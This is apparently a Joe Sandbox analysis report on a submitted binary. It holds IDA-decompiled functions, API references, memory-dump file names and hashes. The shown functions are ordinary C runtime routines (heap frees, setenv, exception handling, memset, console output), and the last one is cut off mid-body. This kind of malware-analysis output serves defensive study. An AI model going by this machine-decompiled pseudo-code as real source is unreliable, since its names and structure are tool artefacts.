Part of subcall function 004066B3: _free.LIBCMT ref: 004066E2
Part of subcall function 004066B3: _free.LIBCMT ref: 004066F4
Part of subcall function 004066B3: _free.LIBCMT ref: 00406706
Part of subcall function 004066B3: _free.LIBCMT ref: 00406718
Part of subcall function 004066B3: _free.LIBCMT ref: 0040672A
Part of subcall function 004066B3: _free.LIBCMT ref: 0040673C
Part of subcall function 004066B3: _free.LIBCMT ref: 0040674E
Part of subcall function 004066B3: _free.LIBCMT ref: 00406760
Part of subcall function 004066B3: _free.LIBCMT ref: 00406772
Part of subcall function 004066B3: _free.LIBCMT ref: 00406784
Part of subcall function 004066B3: _free.LIBCMT ref: 00406796
Part of subcall function 004066B3: _free.LIBCMT ref: 004067A8

_free.LIBCMT ref: 0040704D

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 0040706F
_free.LIBCMT ref: 00407084
_free.LIBCMT ref: 0040708F
_free.LIBCMT ref: 004070B1
_free.LIBCMT ref: 004070C4
_free.LIBCMT ref: 004070D2
_free.LIBCMT ref: 004070DD
_free.LIBCMT ref: 00407115
_free.LIBCMT ref: 0040711C
_free.LIBCMT ref: 00407139
_free.LIBCMT ref: 00407151

Strings

PfA, xrefs: 00407100

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: PfA
API String ID: 161543041-2709604997
Opcode ID: a212ad714cfad8f1f1852c3c08f8bdaf6a751003fef6f57651717f40732b0156
Instruction ID: 249740d5b99519921bff886f7caa4ebcd0f9be59e2d2d63c2f372444e690fca9
Opcode Fuzzy Hash: a212ad714cfad8f1f1852c3c08f8bdaf6a751003fef6f57651717f40732b0156
Instruction Fuzzy Hash: DE314A31A046009FEB31AA39D845B5773E9EF00314F10497BE495EA3D1EEBDB9818A1A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F97 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404F97(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x40f160;
				if(_t68 != 0x40f160) {
					E00405BB5(_t68);
					_t36 = _a4;
				}
				E00405BB5( *((intOrPtr*)(_t36 + 0x3c)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x30)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x34)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x38)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x28)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x2c)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x40)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x44)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00405110(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0040517B(_t67, _t72, _t73, _t77);
			}

APIs

_free.LIBCMT ref: 00404FAD

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00404FB9
_free.LIBCMT ref: 00404FC4
_free.LIBCMT ref: 00404FCF
_free.LIBCMT ref: 00404FDA
_free.LIBCMT ref: 00404FE5
_free.LIBCMT ref: 00404FF0
_free.LIBCMT ref: 00404FFB
_free.LIBCMT ref: 00405006
_free.LIBCMT ref: 00405014

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e4755dc35d0587d11df3447b5287aa04db529ff31c4f5408fe4a0a857521b5a6
Instruction ID: 843b32a356185fe84c4253f2742a9aae9ce8256b5c03ab8ee691aa6bbde78eba
Opcode Fuzzy Hash: e4755dc35d0587d11df3447b5287aa04db529ff31c4f5408fe4a0a857521b5a6
Instruction Fuzzy Hash: 1921BB76900508AFDB11EF95C881DDE7BB4EF08344B0041AAB515AB2A1EBB5FB44CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB3 Relevance: 12.2, APIs: 8, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407DB3(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v0;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t46;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t56;
				void* _t57;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t74;
				signed int _t79;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				void* _t99;
				signed int _t100;
				signed int _t101;
				void* _t105;
				signed int _t108;
				signed int _t110;
				void* _t111;
				signed int _t113;
				signed int _t117;
				signed int _t118;
				WCHAR* _t119;
				void* _t120;
				void* _t122;
				void* _t125;
				void* _t126;

				_t122 = _t120;
				_push(_t122);
				_t126 = _t125 - 0x10;
				_push(__ebx);
				_t87 = _a4;
				_t129 = _t87;
				if(_t87 != 0) {
					_push(__esi);
					_push(__edi);
					_t113 = _t87;
					_t46 = E0040B15C(_t87, 0x3d);
					_v20 = _t46;
					__eflags = _t46;
					if(__eflags == 0) {
						L39:
						 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
						goto L40;
					} else {
						__eflags = _t46 - _t87;
						if(__eflags == 0) {
							goto L39;
						} else {
							_t50 =  *(_t46 + 2) & 0x0000ffff;
							_v24 = _t50;
							_v16 = _t50;
							L44();
							_t117 =  *0x416e90; // 0x260a88
							_t88 = 0;
							__eflags = _t117;
							if(_t117 != 0) {
								L17:
								_v20 = _v20 - _t113 >> 1;
								_t52 = E0040802B(_t113, _v20 - _t113 >> 1);
								_v12 = _t52;
								__eflags = _t52;
								if(_t52 < 0) {
									L25:
									__eflags = _v16 - _t88;
									if(_v16 == _t88) {
										goto L41;
									} else {
										_t53 =  ~_t52;
										_v12 = _t53;
										_t27 = _t53 + 2; // 0x2
										_t99 = _t27;
										__eflags = _t99 - _t53;
										if(_t99 < _t53) {
											goto L40;
										} else {
											__eflags = _t99 - 0x3fffffff;
											if(_t99 >= 0x3fffffff) {
												goto L40;
											} else {
												_t118 = E00407C12(_t117, _t99, 4);
												E00405BB5(_t88);
												_t126 = _t126 + 0x10;
												__eflags = _t118;
												if(_t118 == 0) {
													goto L40;
												} else {
													_t100 = _v12;
													_t113 = _t88;
													_t56 = _v0;
													 *(_t118 + _t100 * 4) = _t56;
													 *(_t118 + 4 + _t100 * 4) = _t88;
													goto L30;
												}
											}
										}
									}
								} else {
									__eflags =  *_t117 - _t88;
									if( *_t117 == _t88) {
										goto L25;
									} else {
										E00405BB5( *((intOrPtr*)(_t117 + _t52 * 4)));
										_t110 = _v12;
										__eflags = _v16 - _t88;
										if(_v16 == _t88) {
											while(1) {
												__eflags =  *(_t117 + _t110 * 4) - _t88;
												if( *(_t117 + _t110 * 4) == _t88) {
													break;
												}
												_t19 = _t110 * 4; // 0x260b30
												 *(_t117 + _t110 * 4) =  *(_t117 + _t19 + 4);
												_t110 = _t110 + 1;
												__eflags = _t110;
											}
											_t118 = E00407C12(_t117, _t110, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0x10;
											_t56 = _t113;
											__eflags = _t118;
											if(_t118 != 0) {
												L30:
												 *0x416e90 = _t118;
											}
										} else {
											_t56 = _v0;
											_t113 = _t88;
											 *(_t117 + _t110 * 4) = _t56;
										}
										__eflags = _a4 - _t88;
										if(_a4 == _t88) {
											goto L41;
										} else {
											_t101 = _t56;
											_t36 = _t101 + 2; // 0x2
											_t111 = _t36;
											do {
												_t57 =  *_t101;
												_t101 = _t101 + 2;
												__eflags = _t57 - _t88;
											} while (_t57 != _t88);
											_t37 = (_t101 - _t111 >> 1) + 2; // 0x0
											_v16 = _t37;
											_t119 = E0040695A(_t37, 2);
											_pop(_t105);
											__eflags = _t119;
											if(_t119 == 0) {
												L38:
												E00405BB5(_t119);
												goto L41;
											} else {
												_t62 = E00406A05(_t119, _v16, _v0);
												__eflags = _t62;
												if(_t62 != 0) {
													_push(_t88);
													_push(_t88);
													_push(_t88);
													_push(_t88);
													_push(_t88);
													E00405C98();
													asm("int3");
													_t64 =  *0x416e90; // 0x260a88
													__eflags = _t64 -  *0x416e94; // 0x260a88
													if(__eflags == 0) {
														_push(_t64);
														_t65 = E00408083(_t88, _t105, _t113, _t119);
														 *0x416e90 = _t65;
														return _t65;
													}
													return _t64;
												} else {
													_t108 =  &(_t119[_v20 + 1]);
													 *((short*)(_t108 - 2)) = 0;
													asm("sbb eax, eax");
													__eflags = SetEnvironmentVariableW(_t119,  ~(_v24 & 0x0000ffff) & _t108);
													if(__eflags == 0) {
														_t74 = E004065F6(__eflags);
														_t88 = _t88 | 0xffffffff;
														__eflags = _t88;
														 *_t74 = 0x2a;
													}
													goto L38;
												}
											}
										}
									}
								}
							} else {
								_t79 =  *0x416e8c; // 0x0
								__eflags = _a4;
								if(_a4 == 0) {
									L10:
									__eflags = _v16 - _t88;
									if(_v16 != _t88) {
										__eflags = _t79;
										if(_t79 != 0) {
											L15:
											 *0x416e90 = E0040695A(1, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0xc;
											goto L16;
										} else {
											 *0x416e8c = E0040695A(1, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0xc;
											__eflags =  *0x416e8c - _t88; // 0x0
											if(__eflags == 0) {
												goto L40;
											} else {
												_t117 =  *0x416e90; // 0x260a88
												__eflags = _t117;
												if(_t117 != 0) {
													goto L17;
												} else {
													goto L15;
												}
											}
										}
									} else {
										_t88 = 0;
										goto L41;
									}
								} else {
									__eflags = _t79;
									if(_t79 == 0) {
										goto L10;
									} else {
										__eflags = E00402EB6();
										if(__eflags == 0) {
											goto L39;
										} else {
											L44();
											L16:
											_t117 =  *0x416e90; // 0x260a88
											__eflags = _t117;
											if(_t117 == 0) {
												L40:
												_t88 = _t87 | 0xffffffff;
												__eflags = _t88;
												L41:
												E00405BB5(_t113);
												_t49 = _t88;
												goto L42;
											} else {
												goto L17;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t85 = E004065F6(_t129);
					 *_t85 = 0x16;
					_t49 = _t85 | 0xffffffff;
					L42:
					return _t49;
				}
			}

APIs

_free.LIBCMT ref: 00407ECB

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fb69b447ea538b1def37adf9f4a6f5e1694c7fa9c57f8b41727878a8f9b7f33f
Instruction ID: 134ba89cc5276f24a0026ba9f1ee4a599761dd11adb1d3e950d2ea3f1fc808c6
Opcode Fuzzy Hash: fb69b447ea538b1def37adf9f4a6f5e1694c7fa9c57f8b41727878a8f9b7f33f
Instruction Fuzzy Hash: 7861F671E04302ABDB24AF79C841A6B77A4EF05314B15457FE905B73C1EB79BD008B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00401F00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E0040EA23(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_push(_t133);
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x416010;
				E00401EC0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x416010);
				E004046E7(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E004046D0(_t103, 0xfffffffe, _t133, 0x416010);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E00404670(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									_push(_t133);
									E00401EC0(_t103, _t118, _t123, _t133, _v12);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x40f0d8;
											if(__eflags != 0) {
												_t98 = E004044C0(__eflags, 0x40f0d8);
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x40f0d8; // 0x401d65
													 *0x418000(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E004046B0(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E004046D0(_t89, _t123, _t133, 0x416010);
											_t89 = _a8;
										}
										_push(_t133);
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E00401EC0(_t103, _t119, _t123, _t133, _v12);
										E00404690();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x416018], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x416904], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x416018], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 00401F37
___except_validate_context_record.LIBVCRUNTIME ref: 00401F3F
_ValidateLocalCookies.LIBCMT ref: 00401FC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00401FF3
_ValidateLocalCookies.LIBCMT ref: 00402048

Strings

csm, xrefs: 00401FDD

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 89ac16e3ccc6b6114ceb04cb8a96fe4a5eb338c79980748b098c818dde7718e7
Instruction ID: d975cb5476b3c8af4e7753ab6fd4a005e227c658bb3f8fa2d0127e1d8b4058f0
Opcode Fuzzy Hash: 89ac16e3ccc6b6114ceb04cb8a96fe4a5eb338c79980748b098c818dde7718e7
Instruction Fuzzy Hash: D141E434A002099BCF10DF69C884A9E7BB1AF45318F14847AF914BB3E2D779E915CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040681A Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040681A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E004068FE(_t45, 7);
					E004068FE(_t45 + 0x1c, 7);
					E004068FE(_t45 + 0x38, 0xc);
					E004068FE(_t45 + 0x68, 0xc);
					E004068FE(_t45 + 0x98, 2);
					E00405BB5( *((intOrPtr*)(_t45 + 0xa0)));
					E00405BB5( *((intOrPtr*)(_t45 + 0xa4)));
					E00405BB5( *((intOrPtr*)(_t45 + 0xa8)));
					E004068FE(_t45 + 0xb4, 7);
					E004068FE(_t45 + 0xd0, 7);
					E004068FE(_t45 + 0xec, 0xc);
					E004068FE(_t45 + 0x11c, 0xc);
					E004068FE(_t45 + 0x14c, 2);
					E00405BB5( *((intOrPtr*)(_t45 + 0x154)));
					E00405BB5( *((intOrPtr*)(_t45 + 0x158)));
					E00405BB5( *((intOrPtr*)(_t45 + 0x15c)));
					return E00405BB5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 004068FE: _free.LIBCMT ref: 00406923

_free.LIBCMT ref: 00406868

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00406873
_free.LIBCMT ref: 0040687E
_free.LIBCMT ref: 004068D2
_free.LIBCMT ref: 004068DD
_free.LIBCMT ref: 004068E8
_free.LIBCMT ref: 004068F3

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 220fc9b63bbb487eddf950a848d7cfc59285a1d61a2781ac85f7cdbba02dc7e0
Instruction ID: 9a5947df7f2f7171008d3c83b437674f844d4a09c051de9a8661a7ac415e416a
Opcode Fuzzy Hash: 220fc9b63bbb487eddf950a848d7cfc59285a1d61a2781ac85f7cdbba02dc7e0
Instruction Fuzzy Hash: 44115132542B04B6E931BBB1CC0AFC777AC9F00704F41483EB29A760E2EABCB5255B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8DF Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E0040A8DF(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x416010; // 0x34f38f42
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x417158 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E00405421( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x417158 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x416768)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x416768)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E00409670( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
